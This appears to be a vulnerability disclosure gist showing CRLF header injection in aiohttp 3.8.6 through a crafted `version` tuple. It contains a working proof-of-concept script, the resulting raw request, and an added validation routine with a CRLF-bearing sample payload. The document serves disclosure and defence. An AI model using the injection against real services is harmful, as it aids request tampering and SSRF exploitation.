Gist jnovikov/184afb593d9c2114d77f508e0ccd508e
aiohttp CRLF injection via Version
```python
import aiohttp
import asyncio

async def main():
    # A tuple passed as `version` is used verbatim in the request line (only a
    # string value is parsed with int()), so the CRLF in the second element
    # reaches the wire unchanged and a header is injected after "HTTP/1.1.".
    async with aiohttp.ClientSession(version=("1.1", "\r\nPwnedBy: jnovikov"), headers={'connection': 'Close'}) as session:
        async with session.get('http://localhost:5000') as response:
            print(response.status)
            print(await response.text())

asyncio.run(main())
```
```
nc -l 5000
GET / HTTP/1.1.
PwnedBy: jnovikov
Host: localhost:5000
Connection: Close
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Python/3.11 aiohttp/3.8.6
```
Current aiohttp version (3.8.6) is vulnerable to CRLF injection if an attacker can control the HTTP version specified for the request.
If the attacker can specify a custom array (from JSON for example), validation won't be triggered and the attacker would be able to change the request (headers).
This can help with the exploitation of various SSRF vulnerabilities.
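One way for an application that builds aiohttp requests from user-supplied JSON to close the gap described above, as an added example that is not part of the gist and not aiohttp's own code: validate the `version` field yourself and only ever hand aiohttp a pair of small integers. The function names `parse_http_version` and `version_from_json`, the allowed-version set and the two sample JSON documents are constructed here for illustration.

```python
import json
import re
from typing import Any, Tuple

# Strict form: one digit, a dot, one digit. Matched with fullmatch() so a
# trailing "\n" (which "$" would tolerate) or any appended text is rejected.
_VERSION_RE = re.compile(r"([0-9])\.([0-9])")

# Versions this client is allowed to put on the request line (constructed policy).
_ALLOWED = frozenset({(1, 0), (1, 1)})


def parse_http_version(value: Any) -> Tuple[int, int]:
    """Coerce an untrusted value (for example a field decoded from JSON) into a
    (major, minor) tuple of ints, or raise ValueError.

    aiohttp only int()-parses a *string* version; a tuple or list is used as-is
    when it formats "HTTP/{major}.{minor}", so a list of strings is exactly the
    shape that carries a CRLF onto the wire. Never let such a list through.
    """
    if isinstance(value, str):
        m = _VERSION_RE.fullmatch(value)
        if m is None:
            raise ValueError(f"malformed HTTP version string: {value!r}")
        major, minor = int(m.group(1)), int(m.group(2))
    elif isinstance(value, (tuple, list)) and len(value) == 2:
        major, minor = value
        # bool is a subclass of int; reject it explicitly along with non-ints.
        for part in (major, minor):
            if isinstance(part, bool) or not isinstance(part, int):
                raise ValueError(f"HTTP version parts must be ints: {value!r}")
    else:
        raise ValueError(f"unsupported HTTP version value: {value!r}")

    if (major, minor) not in _ALLOWED:
        raise ValueError(f"HTTP version {major}.{minor} not allowed")
    return (major, minor)


def version_from_json(document: str, default: Tuple[int, int] = (1, 1)) -> Tuple[int, int]:
    """Read the optional "version" key of a JSON request spec and validate it."""
    spec = json.loads(document)
    if "version" not in spec:
        return default
    return parse_http_version(spec["version"])


# Constructed sample inputs: a benign spec, and one shaped like the gist's
# payload (a two-element array whose second element starts with CRLF).
BENIGN_SPEC = '{"url": "http://localhost:5000", "version": "1.1"}'
CRLF_SPEC = '{"url": "http://localhost:5000", "version": ["1.1", "\\r\\nX-Injected: yes"]}'


def demo() -> Tuple[Tuple[int, int], str]:
    """Return (validated version of the benign spec, error text for the CRLF spec)."""
    good = version_from_json(BENIGN_SPEC)
    try:
        version_from_json(CRLF_SPEC)
        err = ""
    except ValueError as exc:
        err = str(exc)
    return good, err


if __name__ == "__main__":
    print(demo())
```

The validated pair can be passed to the client as `aiohttp.HttpVersion(*parse_http_version(value))`; because both components are guaranteed to be single-digit ints, the request line aiohttp formats from them cannot contain anything but `HTTP/d.d`, regardless of what the JSON looked like.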